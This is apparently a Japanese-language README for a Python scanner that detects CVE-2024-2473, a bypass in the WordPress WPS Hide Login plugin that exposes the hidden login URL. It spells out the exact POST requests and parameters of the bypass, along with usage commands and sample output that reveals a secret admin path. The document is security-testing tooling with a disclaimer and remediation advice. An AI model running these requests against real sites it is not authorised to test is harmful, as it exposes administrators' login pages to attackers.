
WPS Hide Login ≤ 1.9.15.2 を実行しているWordPressサイトでログインページの漏洩を検出するプロフェッショナルなPythonスキャナー
コード作成者:Venexy
WPS Hide Login は、管理者がデフォルトの /wp-login.php URL をカスタムの隠しパスに変更できる人気のWordPressプラグインです。これは難読化によるセキュリティとして機能します。
このスキャナーは CVE-2024-2473 を検出します。これは、action=postpass パラメータを指定することでプラグインの保護メカニズムを完全にバイパスし、認証されていない攻撃者に隠しログインページのURLを露呈させる脆弱性です。
WPS Hide Login プラグインは、WordPressのログインページをデフォルトの /wp-login.php から管理者が選択したカスタムURLに移行します。しかし、1.9.15.2 までの全バージョンにおいて、/wp-login.php または /wp-admin/ に action=postpass クエリパラメータを指定することでこの保護がバイパスされ、隠しログインフォームの実際のアクションURLが明らかになります。これにより、認証されていない攻撃者に秘密のログインパスが露呈します。
スキャナーは脆弱性の攻撃フローを3つのフェーズで再現します。
Phase 1 ─► Confirm target is a WordPress installation
│
▼
Phase 2a ─► POST /wp-login.php?action=postpass
with body: action=lostpassword&post_password=test
Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
Extract hidden login URL from form action attribute
│
Phase 2b ─► POST /wp-admin/?action=postpass
Check: HTTP 302 redirect to location containing reauth=1 or /login
│
▼
Report hidden login URL if discovered
フェーズ2aまたはフェーズ2b のいずれかが一致した場合、ターゲットは 脆弱 と判定されます。
requests ライブラリ1. リポジトリをクローン
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. 依存関係をインストール
pip install requests
注: Python仮想環境やKali Linuxを使用している場合は、以下のコマンドが必要になる場合があります。
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| 引数 | 説明 | デフォルト |
|---|---|---|
-u, --url | ターゲットWordPressのベースURL(必須) | — |
-t, --timeout | HTTPリクエストのタイムアウト(秒) |
# 基本スキャン
python CVE-2024-2473.py -u https://example.com
# カスタムタイムアウトでスキャン
python CVE-2024-2473.py -u https://example.com --timeout 15
# HTTPでスキャン
python CVE-2024-2473.py -u http://192.168.1.100
...
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • WPS Hide Login Page Identifier │
│ Coded by Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed — https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Severity Medium (CVSS 5.3 / EPSS 93rd percentile)
CWE CWE-200 — Exposure of Sensitive Information
CVSS Vector AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass
====================================================
HIDDEN LOGIN URL DISCOVERED
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
このツールは、許可されたセキュリティテストおよび教育目的のみを対象としています。
作成者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。セキュリティ評価を行う前に、必ずターゲットシステムの所有者から明示的な書面による許可を得てください。無許可のスキャンやシステムの悪用は違法であり、非倫理的です。
責任を持って使用してください。
Venexy が ❤️ を込めて作成 (https://github.com/m4xsec)
このツールが役に立ったなら、リポジトリに ⭐🌟🌟🌟 を付けることを検討してください。
| フィールド | 詳細 |
|---|
| CVE ID | CVE-2024-2473 |
| 影響を受けるバージョン | WordPress用 WPS Hide Login プラグイン ≤ 1.9.15.2 |
| 重要度 | 中 |
| CVSSスコア | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — 機密情報の露出 |
| EPSSスコア | 0.10433 (93パーセンタイル) |
| 認証の必要性 | なし |
| ベンダー | WPServeur |
| 対策 | プラグインをバージョン > 1.9.15.2 に更新 |
10 |
| リソース | リンク |
|---|
| NVD — CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Wordfence セキュリティ勧告 | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| WPS Hide Login プラグイン | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| CVSS 3.1 計算ツール | https://www.first.org/cvss/calculator/3.1 |